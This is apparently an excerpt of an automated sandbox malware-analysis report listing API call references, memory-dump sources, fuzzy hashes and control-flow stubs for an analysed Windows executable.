                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                • String ID:
                                                • API String ID: 3808545654-0
                                                • Opcode ID: 8f9191b43f1087fd91e2bc6620e9991732759c8a76e5fb6f86f4dddf7fac1548
                                                • Instruction ID: 8058adb7fc53f801c03006c9ef56a62efa99793a140a93f16ed6c143b7d909dc
                                                • Opcode Fuzzy Hash: 8f9191b43f1087fd91e2bc6620e9991732759c8a76e5fb6f86f4dddf7fac1548
                                                • Instruction Fuzzy Hash: 9A015271944240EFE701ABB4AE8A6D97FB49F95301F10457EE241F61E2CAB800459F2D
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2455471246.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2455454451.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000000.00000002.2455493031.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000000.00000002.2455538566.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                • String ID:
                                                • API String ID: 1148316912-0
                                                • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                APIs
                                                • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: 9ccf06a462700f0ed3a97b5983b11f9e7e1ee2bcf46f86b5230f61e7ee9921c4
                                                • Instruction ID: face61d34558c4de7c2b3a6e9a6cb1e1a296a7661f17e088ac2b3614559d71e0
                                                • Opcode Fuzzy Hash: 9ccf06a462700f0ed3a97b5983b11f9e7e1ee2bcf46f86b5230f61e7ee9921c4
                                                • Instruction Fuzzy Hash: 2DF0FF72604518AFDB01DBE4DF88CEEB7BCEB48341B14047AF641F6191CA749D019B78
                                                APIs
                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
                                                • Instruction ID: 74a91dccfe9731269d403f92625f9bdea7e35384dcad0b9637cdbdb8d435ba20
                                                • Opcode Fuzzy Hash: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
                                                • Instruction Fuzzy Hash: 4D21C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB18
                                                APIs
                                                • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B43
                                                • wsprintfW.USER32 ref: 00404B4C
                                                • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: c9a6e7e492f6bdeefc1d450629950baf89c1ca8cbbe940ede2bd0e57b0caaae8
                                                • Instruction ID: a69b8d9c405cb410f429d1b91b3aaf5cd8934f07bb3ea9cf38393447591b3b6c
                                                • Opcode Fuzzy Hash: c9a6e7e492f6bdeefc1d450629950baf89c1ca8cbbe940ede2bd0e57b0caaae8
                                                • Instruction Fuzzy Hash: EA11EB736041283BDB00A66DDC42E9F369CDB81338F154237FA66F21D1D9B8D82146E8
                                                APIs
                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00405B59
                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00405B63
                                                • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B75
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B53
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2659869361-3081826266
                                                • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                • Instruction ID: 33d5b4b63083ad43afaa288e046e1f08ed21b79f7f5b9eb46acb358563388364
                                                • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                • Instruction Fuzzy Hash: 86D05E31101924AAC121BB549C04DDF63ACAE86304342087AF541B20A5C77C296286FD
                                                APIs
                                                • DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
                                                • GetTickCount.KERNEL32 ref: 00402E8E
                                                • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                                • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                • String ID:
                                                • API String ID: 2102729457-0
                                                • Opcode ID: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                • Instruction ID: fb236cf74f4011b48551144809540ae7a3d608603197ef92b98d1837a73ee17d
                                                • Opcode Fuzzy Hash: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                • Instruction Fuzzy Hash: BDF05E30941620EBC6316B20FF0DA9B7B69BB44B42745497AF441B19E8C7B44881CBDC
                                                APIs
                                                • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3420,004038D3,004036E9,00000006,?,00000006,00000008,0000000A), ref: 00403915
                                                • GlobalFree.KERNEL32(?), ref: 0040391C
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040390D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Free$GlobalLibrary
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 1100898210-3081826266
                                                • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                • Instruction ID: e66732d9f8c7dde22b06ec40e1a6716a7c13e86cf839674f34118547447e98ef
                                                • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                • Instruction Fuzzy Hash: 95E012739019209BC6215F55ED08B5E7B68AF58B22F05447AE9807B26087B45C929BD8
                                                APIs
                                                • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3507071243740008011.exe,C:\Users\user\Desktop\3507071243740008011.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BA5
                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3507071243740008011.exe,C:\Users\user\Desktop\3507071243740008011.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BB5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrlen
                                                • String ID: C:\Users\user\Desktop
                                                • API String ID: 2709904686-224404859
                                                • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                • Instruction ID: a8af4f0e04a9cb416ac945bb8770274a79718c16fb62e87aa8b604c5d62251ee
                                                • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                • Instruction Fuzzy Hash: D5D05EB24019209AD3126B08DC00DAF73A8EF5230074A48AAE841A6165D7B87D8186AC
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                • GlobalFree.KERNEL32(?), ref: 10001203
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2455471246.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2455454451.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000000.00000002.2455493031.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000000.00000002.2455538566.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D01
                                                • CharNextA.USER32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D12
                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                • Instruction ID: eb4b2eb4961b7d09ea4a34ed08b3b50e56f073c3670a6d3e208c08a45fec6953
                                                • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                • Instruction Fuzzy Hash: 10F0F631204918FFD7029FA4DD0499FBBA8EF16350B2580BAE840FB211D674DE01AB98

                                                Execution Graph

                                                Execution Coverage: 0%
                                                Dynamic/Decrypted Code Coverage: 100%
                                                Signature Coverage: 100%
                                                Total number of Nodes: 1
                                                Total number of Limit Nodes: 0
                                                execution_graph 81223 36da2df0 LdrInitializeThunk

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1 36da35c0-36da35cc LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8bcc5cb114d1a01777abb8a01ea6b8a8407f82587b698369e809eb5e0aa59274
                                                • Instruction ID: 90f8c42091854c3df716593cb754e7f96676824cefcffe161132fa3bcf74a39c
                                                • Opcode Fuzzy Hash: 8bcc5cb114d1a01777abb8a01ea6b8a8407f82587b698369e809eb5e0aa59274
                                                • Instruction Fuzzy Hash: 9190023164550402D60071584914B06100547D0201F65C412A143573CD8B958A556DA2

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 36da2df0-36da2dfc LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 5e023c2681b1bd5c2a393f99a6f9292d5d3a183d201cb702dfdc9eb69e636332
                                                • Instruction ID: a258323958d3cdeb6e7ca6d03dcdc0455b10199c2e9256982060e8a4c5332116
                                                • Opcode Fuzzy Hash: 5e023c2681b1bd5c2a393f99a6f9292d5d3a183d201cb702dfdc9eb69e636332
                                                • Instruction Fuzzy Hash: E390023124140413D61171584904B07000947D0241F95C413A143572CD9A568A56A921

                                                Control-flow Graph
                                                • Entry block 36e094e0-36e09529; blocks reference GetPEB and RtlDebugPrintTimes (interactive graph rendering omitted; node edges and executed/not-executed colouring not reproduced)
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $ $0
                                                • API String ID: 3446177414-3352262554
                                                • Opcode ID: 7cdef2eab59d3535b42a801bfbfd253cab59ea60bb5b13e66a4e12e586f86e76
                                                • Instruction ID: 02b3346d02ecf972e151aad3c318abcde7b3391ebcceda2116cf2e7ce28b4864
                                                • Opcode Fuzzy Hash: 7cdef2eab59d3535b42a801bfbfd253cab59ea60bb5b13e66a4e12e586f86e76
                                                • Instruction Fuzzy Hash: D33223B1A083818FE310CF6AC984B4BBBE5BB88348F14592DF5998B390D775D948CF52

                                                Control-flow Graph
                                                • Entry block 36e10274-36e10296; blocks reference RtlDebugPrintTimes and GetPEB (interactive graph rendering omitted; node edges and executed/not-executed colouring not reproduced)
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                • API String ID: 3446177414-1700792311
                                                • Opcode ID: 42951c49093ee5e72976e4b95bc1f4884636cbe09675eb93e308bb2f8f0c7995
                                                • Instruction ID: b4c9567f440f683975b2058d5ef713e444e1fc49a173701565276aad193575fd
                                                • Opcode Fuzzy Hash: 42951c49093ee5e72976e4b95bc1f4884636cbe09675eb93e308bb2f8f0c7995
                                                • Instruction Fuzzy Hash: A9D14339910384EFDB12CF66C850AADBBF2FF0A309F458049E5459BA51CB34D88ADF61
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                • API String ID: 3446177414-1745908468
                                                • Opcode ID: a89351c01df0a8fbc8252c0fbb8c3d3b84a10a34f74e7a136f30ec0608acd3b1
                                                • Instruction ID: f022d8fcc4cd4ee256a8d9f06c6c9e4c576e1a3ab02788a5e8a185882edea309
                                                • Opcode Fuzzy Hash: a89351c01df0a8fbc8252c0fbb8c3d3b84a10a34f74e7a136f30ec0608acd3b1
                                                • Instruction Fuzzy Hash: 3A911135910640DFDB02CF6AC840ADDBBF2FF4A708F158059E944AB6A1CB35D859CF61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                • API String ID: 0-3591852110
                                                • Opcode ID: 5bbf261f302ac3d93797d32e2437f537b7a971638510b4cc7ca8d231c34454e7
